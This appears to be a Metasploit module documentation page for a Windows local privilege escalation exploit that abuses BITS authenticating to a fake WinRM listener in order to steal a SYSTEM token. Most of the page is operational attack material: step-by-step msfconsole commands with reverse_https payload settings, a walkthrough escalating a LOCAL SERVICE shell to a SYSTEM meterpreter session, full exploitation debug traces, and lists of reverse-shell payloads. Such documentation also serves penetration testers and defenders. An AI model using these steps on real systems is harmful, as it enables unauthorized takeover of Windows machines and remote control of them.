SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service. - Metasploit
This page contains detailed information about how to use the exploit/windows/local/bits_ntlm_token_impersonation metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.
Module: exploit/windows/local/bits_ntlm_token_impersonation
Source code: modules/exploits/windows/local/bits_ntlm_token_impersonation.rb
Disclosure date: 2019-12-06
Last modification time: 2021-09-08 21:56:02 +0000
Supported architecture(s): x86, x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module exploit BITS behavior which tries to connect to the local Windows Remote Management server (WinRM) every times it starts. The module launches a fake WinRM server which listen on port 5985 and triggers BITS. When BITS starts, it tries to authenticate to the Rogue WinRM server, which allows to steal a SYSTEM token. This token is then used to launch a new process as SYSTEM user. In the case of this exploit, notepad.exe is launched as SYSTEM. Then, it write shellcode in its previous memory space and trigger its execution. As this exploit uses reflective dll injection, it does not write any file on the disk. See /documentation/modules/exploit/windows/local/bits_ntlm_token_impersonation.md for complementary words of information. Vulnerable operating systems are Windows 10 and Windows servers where WinRM is not running. Lab experiments has shown that Windows 7 does not exhibit the vulnerable behavior. WARNING: - As this exploit runs a service on the target (Fake WinRM on port 5985), a firewall popup may appear on target screen. Thus, this exploit may not be completely silent. - This exploit has been successfully tested on : Windows 10 (10.0 Build 19041) 32 bits Windows 10 Pro, Version 1903 (10.0 Build 18362) 64 bits - This exploit failed because of no BITS authentication attempt on: Windows 7 (6.1 Build 7601, Service Pack 1) 32 bits - Windows servers are not vulnerable because a genuine WinRM service is already running, except if the user has disabled it (Or if this exploit succeed to terminate it). - SE_IMPERSONATE_NAME or SE_ASSIGNPRIMARYTOKEN_NAME privs are required. - BITS must not be running. - This exploit automatically perform above quoted checks. run "check" command to run checklist.
Module Ranking and Traits
Module Ranking:
- great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- screen-effects: Module may show something on the screen (Example: a window pops up).
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/windows/local/bits_ntlm_token_impersonation
msf exploit(bits_ntlm_token_impersonation) > show targets
... a list of targets ...
msf exploit(bits_ntlm_token_impersonation) > set TARGET target-id
msf exploit(bits_ntlm_token_impersonation) > show options
... show and set options ...
msf exploit(bits_ntlm_token_impersonation) > set SESSION session-id
msf exploit(bits_ntlm_token_impersonation) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
Windows 10 and Windows servers where WinRM is not running.
Labs experiment has shown that Windows 7 is not vulnerable because BITS service does not attempt to shoot on WinRM port (see Module Description section of this document). Windows XP has not been tested, but if Windows 7 is not vulnerable, it is likely neither its case.
Regarding Windows 10 and Windows servers, the availability of port 5985 is a necessary and sufficient condition for being vulnerable.
This module exploits BITS behavior which tries to authenticate on local WinRM server (port 5985) even if this service is not running. As this module runs a fake service on WinRM port to steal a SYSTEM token, this port must be available. However, please note that WinRM service is natively running on windows servers preventing to run this exploit successfully.
Nevertheless, if WinRM service is disabled by an admin, or just killed, the operating system becomes vulnerable.
Verification Steps
- get a meterpreter session which has either SE_IMPERSONATE_NAME or SE_ASSIGNPRIMARYTOKEN_NAME privilege.
- Do:
use exploits/windows/local/bits_ntlm_token_impersonation
- Do:
set SESSION <previous meterpreter session>
- Do:
set PAYLOAD windows/meterpreter/reverse_https
- Do:
set LHOST <your ip>
- Do:
set LPORT <your port>
- Do:
exploit
- A new meterpreter session should pop.
Options
HOST_PROCESS → The process which will be launched as SYSTEM and execute metasploit shellcode. This process should normally be hidden because launched without graphical interface. However, during lab experiments, some processes has shown persistent screen effects. For instance, experiments with calc.exe was tested and a buggy unresponsive window appeared and persisted until next reboot. Default choice is notepad.exe and it has not shown any screen effects during lab experiments.
SESSION → index of the previous meterpreter session in through of which the exploit will be run.
SHUTDOWN_SERVICES → This boolean determines if ruby module should attempt to terminate WinRM and BITS if they are found running. Indeed, both services must be down for the exploit to succeed (WinRM because we want to put a fake WinRM service listening on its port, and BITS because the vulnerable behavior occurs at its startup). Default value is false for multiple reasons. First the exploit is designed to wait for BITS to terminate by itself and you may get a shell even if it is still running at the end of check. Secondly, in common usecases (previous meterpreter session running as LOCAL SERVICE), you don't have sufficient privileges to do that. You only can do it if you are in administrator group. Thirdly, attempting to terminate a service may trigger antiviruses, may be logged and may cause problems on the target system.
WINRM_RPORT → Port on which the exploit impersonating a genuine WinRM service will listen on remote target. Default value is default WinRM port (5985). However, in some Windows configuration, WinRM default port can be set to 47001. This is the case for instance if no WinRM listener is set. More information regarding this here: https://docs.microsoft.com/en-us/windows/win32/winrm/obtaining-data-from-the-local-computer If the exploit fails, you may want to try other ports commonly used by WinRM.
Scenarios
Let's assume you have in any way compromised a service process such as IIS for instance. So your meterpreter session should
look like this:
meterpreter > sysinfo
Computer : DESKTOP-5VBUUE9
OS : Windows 10 (10.0 Build 18362).
Architecture : x64
System Language : fr_FR
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
By default, service users hold the SE_IMPERSONATE_NAME privilege so this exploit is mainly designed to escalate from a service account to local system. Lab experiments has shown it works for both LOCAL SERVICE and NETWORK SERVICE:
msf6 exploit(exploit/multi/handler) > use exploit/windows/local/bits_ntlm_token_impersonation
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > exploit
[*] Started HTTPS reverse handler on https://192.168.1.33:443
[*] Executing automatic check (disable AutoCheck to override)
[!] BITS is currently running. It must be down for the exploit to succeed.
[!] BITS is running. Don't panic, the exploit should handle this, but you have to wait for BITS to terminate.
[+] The target appears to be vulnerable.
[*] Launching notepad to host the exploit...
[+] Process 5044 launched.
[*] Injecting exploit into 5044...
[*] Exploit injected. Injecting payload into 5044...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] https://192.168.1.33:444 handling request from 192.168.1.248; (UUID: fsjcbuvp) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 2 opened (192.168.1.33:444 -> 192.168.1.248:51077) at 2020-12-11 08:56:29 +0000
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Module Description
This module exploits BITS behavior which tries to connect to the local Windows Remote Management server (WinRM) every times it starts. The exploit dll (loaded through a previous unprivilegied meterpreter session) launches a fake WinRM server which listens on port 5985 and triggers BITS. When BITS starts, it tries to authenticate to the Rogue WinRM server, which allows to steal a SYSTEM token. This token is then used to launch a new process as SYSTEM user. In the case of this exploit, an invisible notepad is launched and shellcode is written inside and executed. Thus, this exploit doesn't write any file on the disk.
This exploit has been discovered by Antonio Cocomazzi, Andrea Pierini and Roberto (0xea31) and it has been implemented in metasploit on the basis of their proof of concept available on their github repository:
https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/ https://github.com/antonioCoco/RogueWinRM
This exploit has been successfully tested on : - Windows 10 (10.0 Build 19041) 32 bits - Windows 10 Pro, Version 1903 (10.0 Build 18362) 64 bits
This exploit failed because of no BITS authentication attempt on: - Windows 7 (6.1 Build 7601, Service Pack 1) 32 bits
Warnings
- SE_IMPERSONATE_NAME or SE_ASSIGNPRIMARYTOKEN_NAME privs are required.
- WinRM and in a lesser extent BITS must not be running.
- As this dll exploit runs a service on the target (Fake WinRM on port 5985), a firewall popup may appear on target screen. Thus, this exploit is not completely silent.
- Windows servers are not vulnerable because a genuine WinRM service is already running.
Debugging
You may want to debug or reverse engineer this exploit. You need first to compile the dll sources with DEBUGTRACE flag. Then, when launching the exploit, you can get runtime debug messages. Here are complete debug messages during a successful exploitation:
1 0.00000000 [7188] [dllmain] Entry point.
2 0.00020640 [7188] [extract_metasploit_data] WinRM port: 5985
3 0.00035820 [7188] [extract_metasploit_data] Process to launch: notepad.exe
4 0.00039800 [7188] [extract_metasploit_data] shellcode length: 626
5 0.00055150 [7188] [createProcessMethod] Attempting to enable SE_IMPERSONATE_NAME privilege...
6 0.00128340 [7188] [EnablePriv] SUCCESS: Privilege enabled.
7 0.00360550 [7188] [startListener] SUCCESS: WSAStartup initialized
8 0.00363250 [7188] [startListener] SUCCESS: getaddrinfo initialized. host:127.0.0.1, port: 5985
9 0.00439900 [7188] [startListener] SUCCESS: socket created.
10 0.00447850 [7188] [startListener] SUCCESS: socket bound.
11 0.00449390 [7188] [startListener] SUCCESS: socket is now listening for incoming connexions.
12 1.00682116 [7188] [isBitsRunning] Checking if BITS is running (It should not)...
13 1.00756419 [7188] [isBitsRunning] SUCCESS: BITS is not running.
14 1.00760865 [7188] [triggerBits] Attempting to start BITS...
15 1.27990735 [7188] [startListener] SUCCESS: socket accept stage successful.
16 1.27999246 [7188] [handleListener] Rogue WinRM service now listening for connection on port 5985.
17 1.28006208 [7188] [handleNTLMPConnection] Received http negotiate request.
18 1.28009701 [7188] [hexDump] Hexdump of packet:
19 1.28023875 [7188] [hexDump] 0000 50 4f 53 54 20 2f 77 73 6d 61 6e 20 48 54 54 50 POST /wsman HTTP
20 1.28033876 [7188] [hexDump] 0010 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e /1.1..Connection
21 1.28043485 [7188] [hexDump] 0020 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f : Keep-Alive..Co
22 1.28052747 [7188] [hexDump] 0030 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c ntent-Type: appl
23 1.28062499 [7188] [hexDump] 0040 69 63 61 74 69 6f 6e 2f 73 6f 61 70 2b 78 6d 6c ication/soap+xml
24 1.28071892 [7188] [hexDump] 0050 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 31 36 0d ;charset=UTF-16.
25 1.28080654 [7188] [hexDump] 0060 0a 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 3a 20 .Authorization:
26 1.28090227 [7188] [hexDump] 0070 4e 65 67 6f 74 69 61 74 65 20 59 47 77 47 42 69 Negotiate YGwGBi
27 1.28100324 [7188] [hexDump] 0080 73 47 41 51 55 46 41 71 42 69 4d 47 43 67 47 6a sGAQUFAqBiMGCgGj
28 1.28108621 [7188] [hexDump] 0090 41 59 42 67 6f 72 42 67 45 45 41 59 49 33 41 67 AYBgorBgEEAYI3Ag
29 1.28115559 [7188] [hexDump] 00a0 49 4b 42 67 6f 72 42 67 45 45 41 59 49 33 41 67 IKBgorBgEEAYI3Ag
30 1.28125131 [7188] [hexDump] 00b0 49 65 6f 6b 49 45 51 45 35 55 54 45 31 54 55 31 IeokIEQE5UTE1TU1
31 1.28134823 [7188] [hexDump] 00c0 41 41 41 51 41 41 41 4c 65 79 43 4f 49 4a 41 41 AAAQAAALeyCOIJAA
32 1.28144515 [7188] [hexDump] 00d0 6b 41 4e 77 41 41 41 41 38 41 44 77 41 6f 41 41 kANwAAAA8ADwAoAA
33 1.28154385 [7188] [hexDump] 00e0 41 41 43 67 43 36 52 77 41 41 41 41 39 45 52 56 AACgC6RwAAAA9ERV
34 1.28162599 [7188] [hexDump] 00f0 4e 4c 56 45 39 51 4c 54 56 57 51 6c 56 56 52 54 NLVE9QLTVWQlVVRT
35 1.28167975 [7188] [hexDump] 0100 6c 58 54 31 4a 4c 52 31 4a 50 56 56 41 3d 0d 0a lXT1JLR1JPVVA=..
36 1.28172791 [7188] [hexDump] 0110 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 User-Agent: Micr
37 1.28177559 [7188] [hexDump] 0120 6f 73 6f 66 74 20 57 69 6e 52 4d 20 43 6c 69 65 osoft WinRM Clie
38 1.28182483 [7188] [hexDump] 0130 6e 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 nt..Content-Leng
39 1.28187311 [7188] [hexDump] 0140 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6c 6f 63 th: 0..Host: loc
40 1.28192329 [7188] [hexDump] 0150 61 6c 68 6f 73 74 3a 35 39 38 35 0d 0a 0d 0a alhost:5985....
41 1.28192329 [7188]
42 1.28198123 [7188] [processNtlmBytes] -- handleType1 start --
43 1.28448606 [7188] [HandleType1] Result of AcceptSecurityContext() = status: 0x90312--
44 1.28453183 [7188] [processNtlmBytes] -- handleType1 end --
45 1.28457534 [7188] [forge_ntlmssp_challenge_responses] Forging http response type2 packet...
46 1.28464592 [7188] [hexDump] Hexdump of packet:
47 1.28471112 [7188] [hexDump] 0000 48 54 54 50 2f 31 2e 31 20 34 30 31 20 0d 0a 57 HTTP/1.1 401 ..W
48 1.28477061 [7188] [hexDump] 0010 57 57 2d 41 75 74 68 65 6e 74 69 63 61 74 65 3a WW-Authenticate:
49 1.28485692 [7188] [hexDump] 0020 20 4e 65 67 6f 74 69 61 74 65 20 6f 59 49 42 43 Negotiate oYIBC
50 1.28487158 [7188] [hexDump] 0030 7a 43 43 41 51 65 67 41 77 6f 42 41 61 45 4d 42 zCCAQegAwoBAaEMB
51 1.28495753 [7188] [hexDump] 0040 67 6f 72 42 67 45 45 41 59 49 33 41 67 49 4b 6f gorBgEEAYI3AgIKo
52 1.28498507 [7188] [hexDump] 0050 6f 48 78 42 49 48 75 54 6c 52 4d 54 56 4e 54 55 oHxBIHuTlRMTVNTU
53 1.28507006 [7188] [hexDump] 0060 41 41 43 41 41 41 41 48 67 41 65 41 44 67 41 41 AACAAAAHgAeADgAA
54 1.28509665 [7188] [hexDump] 0070 41 41 31 77 6f 72 69 6f 34 36 75 39 5a 6c 55 6e AA1worio46u9ZlUn
55 1.28518021 [7188] [hexDump] 0080 6f 63 4c 41 41 45 41 41 41 41 41 41 4a 67 41 6d ocLAAEAAAAAAJgAm
56 1.28520679 [7188] [hexDump] 0090 41 42 57 41 41 41 41 43 67 43 36 52 77 41 41 41 ABWAAAACgC6RwAAA
57 1.28528929 [7188] [hexDump] 00a0 41 39 45 41 45 55 41 55 77 42 4c 41 46 51 41 54 A9EAEUAUwBLAFQAT
58 1.28532350 [7188] [hexDump] 00b0 77 42 51 41 43 30 41 4e 51 42 57 41 45 49 41 56 wBQAC0ANQBWAEIAV
59 1.28540862 [7188] [hexDump] 00c0 51 42 56 41 45 55 41 4f 51 41 43 41 42 34 41 52 QBVAEUAOQACAB4AR
60 1.28544271 [7188] [hexDump] 00d0 41 42 46 41 46 4d 41 53 77 42 55 41 45 38 41 55 ABFAFMASwBUAE8AU
61 1.28552401 [7188] [hexDump] 00e0 41 41 74 41 44 55 41 56 67 42 43 41 46 55 41 56 AAtADUAVgBCAFUAV
62 1.28554428 [7188] [hexDump] 00f0 51 42 46 41 44 6b 41 41 51 41 65 41 45 51 41 52 QBFADkAAQAeAEQAR
63 1.28563356 [7188] [hexDump] 0100 51 42 54 41 45 73 41 56 41 42 50 41 46 41 41 4c QBTAEsAVABPAFAAL
64 1.28566802 [7188] [hexDump] 0110 51 41 31 41 46 59 41 51 67 42 56 41 46 55 41 52 QA1AFYAQgBVAFUAR
65 1.28575194 [7188] [hexDump] 0120 51 41 35 41 41 51 41 48 67 42 45 41 45 55 41 55 QA5AAQAHgBEAEUAU
66 1.28578627 [7188] [hexDump] 0130 77 42 4c 41 46 51 41 54 77 42 51 41 43 30 41 4e wBLAFQATwBQAC0AN
67 1.28586805 [7188] [hexDump] 0140 51 42 57 41 45 49 41 56 51 42 56 41 45 55 41 4f QBWAEIAVQBVAEUAO
68 1.28590250 [7188] [hexDump] 0150 51 41 44 41 42 34 41 52 41 42 46 41 46 4d 41 53 QADAB4ARABFAFMAS
69 1.28598428 [7188] [hexDump] 0160 77 42 55 41 45 38 41 55 41 41 74 41 44 55 41 56 wBUAE8AUAAtADUAV
70 1.28601146 [7188] [hexDump] 0170 67 42 43 41 46 55 41 56 51 42 46 41 44 6b 41 42 gBCAFUAVQBFADkAB
71 1.28608716 [7188] [hexDump] 0180 77 41 49 41 47 73 53 5a 71 37 62 7a 74 59 42 41 wAIAGsSZq7bztYBA
72 1.28613508 [7188] [hexDump] 0190 41 41 41 41 41 3d 3d 0d 0a 53 65 72 76 65 72 3a AAAAA==..Server:
73 1.28618777 [7188] [hexDump] 01a0 20 4d 69 63 72 6f 73 6f 66 74 2d 48 54 54 50 41 Microsoft-HTTPA
74 1.28620350 [7188] [hexDump] 01b0 50 49 2f 32 2e 30 0d 0a 43 6f 6e 74 65 6e 74 2d PI/2.0..Content-
75 1.28625381 [7188] [hexDump] 01c0 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d 0a 00 00 Length: 0......
76 1.28625381 [7188]
77 1.28628480 [7188] [handleNTLMPConnection] Sending the 401 http response with ntlm type 2 challenge...
78 1.28635943 [7188] [handleNTLMPConnection] 401 http response sent.
79 1.28725624 [7188] [handleNTLMPConnection] SUCCESS: Received http packet with ntlm type3 response.
80 1.28733253 [7188] [hexDump] Hexdump of packet:
81 1.28734791 [7188] [hexDump] 0000 50 4f 53 54 20 2f 77 73 6d 61 6e 20 48 54 54 50 POST /wsman HTTP
82 1.28743696 [7188] [hexDump] 0010 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e /1.1..Connection
83 1.28746414 [7188] [hexDump] 0020 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f : Keep-Alive..Co
84 1.28755128 [7188] [hexDump] 0030 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c ntent-Type: appl
85 1.28757834 [7188] [hexDump] 0040 69 63 61 74 69 6f 6e 2f 73 6f 61 70 2b 78 6d 6c ication/soap+xml
86 1.28766000 [7188] [hexDump] 0050 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 31 36 0d ;charset=UTF-16.
87 1.28767395 [7188] [hexDump] 0060 0a 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 3a 20 .Authorization:
88 1.28775859 [7188] [hexDump] 0070 4e 65 67 6f 74 69 61 74 65 20 6f 58 63 77 64 61 Negotiate oXcwda
89 1.28778541 [7188] [hexDump] 0080 41 44 43 67 45 42 6f 6c 6f 45 57 45 35 55 54 45 ADCgEBoloEWE5UTE
90 1.28787005 [7188] [hexDump] 0090 31 54 55 31 41 41 41 77 41 41 41 41 41 41 41 41 1TU1AAAwAAAAAAAA
91 1.28789675 [7188] [hexDump] 00a0 42 59 41 41 41 41 41 41 41 41 41 46 67 41 41 41 BYAAAAAAAAAFgAAA
92 1.28798091 [7188] [hexDump] 00b0 41 41 41 41 41 41 57 41 41 41 41 41 41 41 41 41 AAAAAAWAAAAAAAAA
93 1.28800118 [7188] [hexDump] 00c0 42 59 41 41 41 41 41 41 41 41 41 46 67 41 41 41 BYAAAAAAAAAFgAAA
94 1.28809083 [7188] [hexDump] 00d0 41 41 41 41 41 41 57 41 41 41 41 44 58 43 69 4f AAAAAAWAAAADXCiO
95 1.28811765 [7188] [hexDump] 00e0 49 4b 41 4c 70 48 41 41 41 41 44 79 65 33 4e 77 IKALpHAAAADye3Nw
96 1.28817153 [7188] [hexDump] 00f0 34 39 70 77 2f 4f 35 37 6d 67 42 70 66 51 59 57 49pw/O57mgBpfQYW
97 1.28822196 [7188] [hexDump] 0100 4b 6a 45 67 51 51 41 51 41 41 41 4f 6e 6d 38 2b KjEgQQAQAAAOnm8+
98 1.28828132 [7188] [hexDump] 0110 45 37 77 57 65 36 41 41 41 41 41 41 3d 3d 0d 0a E7wWe6AAAAAA==..
99 1.28834140 [7188] [hexDump] 0120 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 User-Agent: Micr
100 1.28840005 [7188] [hexDump] 0130 6f 73 6f 66 74 20 57 69 6e 52 4d 20 43 6c 69 65 osoft WinRM Clie
101 1.28845811 [7188] [hexDump] 0140 6e 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 nt..Content-Leng
102 1.28851688 [7188] [hexDump] 0150 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 6c 6f 63 th: 0..Host: loc
103 1.28857553 [7188] [hexDump] 0160 61 6c 68 6f 73 74 3a 35 39 38 35 0d 0a 0d 0a alhost:5985....
104 1.28857553 [7188]
105 1.28861415 [7188] [handleNTLMPConnection] Using ntlm type3 response in AcceptSecurityContext()...
106 1.28866363 [7188] [processNtlmBytes] -- handleType3 start --
107 1.28932333 [7188] [HandleType3] Result of AcceptSecurityContext() = status: 0x0--
108 1.28935909 [7188] [processNtlmBytes] -- handleType3 end --
109 1.28939426 [7188] [handleNTLMPConnection] Shutting down RogueWinRM service properly...
110 1.28953993 [7188] [handleNTLMPConnection] RogueWinRM service is now down.
111 1.32062924 [7188] [triggerBits] SUCCESS: BITS triggered!
112 1.32064247 [7188] [RunRogueWinRM] authresult 0
113 1.32069910 [7188] [IsTokenSystem] Checking if token is SYSTEM...
114 1.32073796 [7188] [IsTokenSystem] SUCCESS: Token is SYSTEM.
115 1.32080293 [7188] [RunRogueWinRM] Launching new process through CreateProcessWithTokenW().
116 1.32268882 [7188] [RunRogueWinRM] SUCCESS: target process launched as SYSTEM.
117 1.32270396 [7188] [RunRogueWinRM] Attempting to allocate executable memory space in spawned process...
118 1.32278264 [7188] [RunRogueWinRM] SUCCESS: executable memory space successfully allocated.
119 1.32282817 [7188] [RunRogueWinRM] Attempting to write shellcode in spawned process...
120 1.32286501 [7188] [RunRogueWinRM] SUCCESS: shellcode written into SYSTEM process.
121 1.32288563 [7188] [RunRogueWinRM] Attempting to trigger shellcode from spawned process...
122 1.32295120 [7188] [RunRogueWinRM] PWNED ! executing shellcode as SYSTEM.
123 1.32297337 [7188] [dllmain] Exit status: 0
Go back to menu.
Msfconsole Usage
Here is how the windows/local/bits_ntlm_token_impersonation exploit module looks in the msfconsole:
msf6 > use exploit/windows/local/bits_ntlm_token_impersonation
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > show info
Name: SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.
Module: exploit/windows/local/bits_ntlm_token_impersonation
Platform: Windows
Arch: x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2019-12-06
Provided by:
Cassandre
Andrea Pierini (decoder)
Antonio Cocomazzi (splinter_code)
Roberto (0xea31)
Module side effects:
screen-effects
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HOST_PROCESS notepad.exe yes The process which will be launched as SYSTEM and execute metasploit shellcode. This process is launched without graphical interface so it is hidden.
SESSION yes The session to run this module on.
SHUTDOWN_SERVICES false yes Should this module attempt to shutdown BITS and WinRM services if they are running? Setting this parameter to true is useful only if SESSION is part of administrator group. In the common usecase
(running as LOCAL SERVICE) you don't have enough privileges.
WINRM_RPORT 5985 yes Port the exploit will listen on for BITS connexion. As the principle of the exploit is to impersonate a genuine WinRM service, it should listen on WinRM port. This is in most case 5985 but in som
e configuration, it may be 47001.
Payload information:
Avoid: 1 characters
Description:
This module exploit BITS behavior which tries to connect to the
local Windows Remote Management server (WinRM) every times it
starts. The module launches a fake WinRM server which listen on port
5985 and triggers BITS. When BITS starts, it tries to authenticate
to the Rogue WinRM server, which allows to steal a SYSTEM token.
This token is then used to launch a new process as SYSTEM user. In
the case of this exploit, notepad.exe is launched as SYSTEM. Then,
it write shellcode in its previous memory space and trigger its
execution. As this exploit uses reflective dll injection, it does
not write any file on the disk. See
/document ation/modules/exploit/windows/local/bits_ntlm_token_impersonation.md
for complementary words of information. Vulnerable operating systems
are Windows 10 and Windows servers where WinRM is not running. Lab
experiments has shown that Windows 7 does not exhibit the vulnerable
behavior. WARNING: - As this exploit runs a service on the target
(Fake WinRM on port 5985), a firewall popup may appear on target
screen. Thus, this exploit may not be completely silent. - This
exploit has been successfully tested on : Windows 10 (10.0 Build
19041) 32 bits Windows 10 Pro, Version 1903 (10.0 Build 18362) 64
bits - This exploit failed because of no BITS authentication attempt
on: Windows 7 (6.1 Build 7601, Service Pack 1) 32 bits - Windows
servers are not vulnerable because a genuine WinRM service is
already running, except if the user has disabled it (Or if this
exploit succeed to terminate it). - SE_IMPERSONATE_NAME or
SE_ASSIGNPRIMARYTOKEN_NAME privs are required. - BITS must not be
running. - This exploit automatically perform above quoted checks.
run "check" command to run checklist.
References:
https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
https://github.com/antonioCoco/RogueWinRM
Module Options
This is a complete list of options available in the windows/local/bits_ntlm_token_impersonation exploit:
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > show options
Module options (exploit/windows/local/bits_ntlm_token_impersonation):
Name Current Setting Required Description
---- --------------- -------- -----------
HOST_PROCESS notepad.exe yes The process which will be launched as SYSTEM and execute metasploit shellcode. This process is launched without graphical interface so it is hidden.
SESSION yes The session to run this module on.
SHUTDOWN_SERVICES false yes Should this module attempt to shutdown BITS and WinRM services if they are running? Setting this parameter to true is useful only if SESSION is part of administrator group. In the common usecase
(running as LOCAL SERVICE) you don't have enough privileges.
WINRM_RPORT 5985 yes Port the exploit will listen on for BITS connexion. As the principle of the exploit is to impersonate a genuine WinRM service, it should listen on WinRM port. This is in most case 5985 but in so
me configuration, it may be 47001.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC none yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Advanced Options
Here is a complete list of advanced options supported by the windows/local/bits_ntlm_token_impersonation exploit:
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > show advanced
Module advanced options (exploit/windows/local/bits_ntlm_token_impersonation):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
ForceExploit false no Override check result
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 120 no Additional delay in seconds to wait for a session
Payload advanced options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadBindPort no Port to bind reverse tcp socket to on target system.
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/local/bits_ntlm_token_impersonation module can exploit:
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/local/bits_ntlm_token_impersonation exploit:
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/tight_loop normal No Generic x86 Tight Loop
5 payload/windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
6 payload/windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager
